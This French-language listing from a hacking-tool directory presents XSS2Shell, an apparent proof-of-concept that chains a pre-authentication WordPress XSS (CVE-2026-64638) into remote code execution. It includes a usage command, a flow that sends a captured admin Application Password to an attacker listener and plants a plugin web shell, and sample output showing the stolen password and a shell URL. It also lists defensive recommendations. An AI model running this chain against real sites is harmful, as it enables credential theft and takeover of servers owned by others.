Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
XSS2Shell — # Preuve de concept d'exploitation XSS pré-authentification vers RCE sur WordPress (xss2shell & CVE-2026-64638) | Kitploit
Outils/GitHubGitHub/wordsec/xss2shell
Génération de PayloadsExploitationExploitation d'Applications WebPost-ExploitationSécurité WebTests d'IntrusionApprentissage et Éducation
GitHubwordsec/xss2shell

XSS2Shell

# Preuve de concept d'exploitation XSS pré-authentification vers RCE sur WordPress (xss2shell & CVE-2026-64638)

Voir le dépôt
7115il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

XSS2Shell

XSS2Shell est une preuve de concept éducative pour CVE-2026-64638, démontrant l'impact d'un problème de XSS avant authentification dans des installations WordPress vulnérables. Avec la participation explicite d'un administrateur, la preuve de concept capture un mot de passe d'application WordPress, publie une page temporaire, téléverse un plugin de test et vérifie si le point de terminaison du shell résultant peut exécuter une commande.

Contexte technique : XSS WordPress avant authentification vers RCE : CVE-2026-64638

Éducation et tests autorisés uniquement. N'exécutez cet outil que contre des sites WordPress que vous possédez ou pour lesquels vous avez obtenu l'autorisation écrite d'évaluer. Ne l'utilisez pas pour cibler des administrateurs tiers ou des systèmes de production.

Prérequis

  • Python 3.7 ou plus récent
  • Une installation de test WordPress accessible
  • Un administrateur capable de se connecter à la cible et d'ouvrir l'URL de l'attaquant
  • Un accès réseau depuis le navigateur de l'administrateur vers l'adresse du listener
  • Aucun paquet Python tiers

Utilisation

root@kitploit:~
python3 xss2shell_poc.py -t http://wordpress.research.local --lhost 192.168.1.227 --lport 8080 -c "whoami"

Options

OptionRequisDescription
-t, --targetOuiURL de base de WordPress, incluant http:// ou https://
-c, --commandOuiCommande à exécuter une fois le shell disponible
--lhostNonIP du listener à lier et à annoncer ; par défaut, l'IP LAN détectée
--lportNonPort du listener ; 0 sélectionne un port disponible aléatoire
--keepNonConserver les artefacts publiés au lieu de supprimer la page temporaire

L'URL cible est normalisée automatiquement, donc une barre oblique finale est facultative.

Déroulement de l'opération

  1. L'outil vérifie que /wp-login.php est accessible et ressemble à une page de connexion WordPress.
  2. Il démarre un listener HTTP local et affiche l'URL du listener.
  3. L'administrateur autorisé se connecte à la cible et ouvre cette URL.
  4. Le flux navigateur demande un mot de passe d'application et envoie le résultat au listener.
  5. La preuve de concept publie une page attaquante temporaire à l'aide des identifiants capturés.
  6. La page téléverse le plugin de test avec la session de l'administrateur.
  7. L'outil vérifie shell.php et exécute la commande demandée.

Le listener doit être accessible depuis le navigateur de l'administrateur. Le NAT, le pare-feu, le proxy, le blocage des fenêtres pop-up et les règles de contenu mixte peuvent empêcher le flux navigateur de s'achever.

Exemple de sortie

root@kitploit:~
 __          __           _  _____           
 \ \        / /          | |/ ____|          
  \ \  /\  / /__  _ __ __| | (___   ___  ___ 
   \ \/  \/ / _ \| '__/ _` |\___ \ / _ \/ __|
    \  /\  / (_) | | | (_| |____) |  __/ (__ 
     \/  \/ \___/|_|  \__,_|_____/ \___|\___|
                                              
                                              
xss2shell & CVE-2026-64638 |  https://wordsec.net/ - Education Purpose Only


============================================================
[*] XSS2Shell starting ...
[*] Checking target: http://wordpress.research.local/wp-login.php
[+] Admin panel found: http://wordpress.research.local/wp-login.php
[+] Attacker server listening: 192.168.1.227:8080
[*] On the target website, the admin must open this page and log in:
    ->  http://wordpress.research.local/wp-login.php
[*] Then the admin opens the link that was sent to them:
    ->  http://192.168.1.227:8080/
[*] Waiting for the admin to visit (Ctrl+C to stop) ...
[+] Child popup document initialized
[+] Popup window ready, XSS payload prepared
[+] Application Password saved to xss2shell_creds.json for later runs (shell: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php)
[+] XSS payload POSTed to wp-login.php
[+] Application Password stolen: user=admin pass=3SGS Loba 2Txw EzWz EbZC xZst (saved to xss2shell_creds.json)
[+] Attacker page published: http://wordpress.research.local/xss2shell-1786125273210/
[+] Plugin ZIP upload request sent with the victim's session
[+] Shell reachable: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php

============================================================
[+] Command output:
www-data
============================================================
[*] Cleanup: published page deleted (id=61)
[*] Cleanup: Application Password, plugin shell, and saved credentials preserved

[+] Shell link: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php?cmd=whoami
[+] Done.

Artefacts et nettoyage

Les exécutions réussies enregistrent le mot de passe d'application capturé dans xss2shell_creds.json pour le réutiliser lors d'exécutions ultérieures. La page publiée temporaire est supprimée automatiquement après la commande, sauf si --keep est utilisé.

Le plugin de test, le point de terminaison du shell, le mot de passe d'application et les identifiants enregistrés sont intentionnellement conservés par la preuve de concept actuelle. Retirez-les manuellement du site de test après une évaluation autorisée, puis supprimez xss2shell_creds.json localement.

Traitez le fichier d'identifiants comme sensible et ne le commettez jamais dans un système de contrôle de version.

Recommandations défensives

  • Mettez à jour WordPress vers une version non affectée par CVE-2026-64638.
  • Imposez une authentification administrateur forte et activez la 2FA.
  • Limitez l'installation de plugins et la création de mots de passe d'application aux rôles de confiance.
  • Vérifiez les mots de passe d'application des administrateurs, les pages publiées et les plugins récemment installés après les tests.
  • Surveillez et bloquez les requêtes inattendues vers les points de terminaison de téléversement de plugins et les points de terminaison REST.

Licence

Utilisez la licence incluse dans ce dépôt.

Réalisé par WordSec

Télécharger l’outil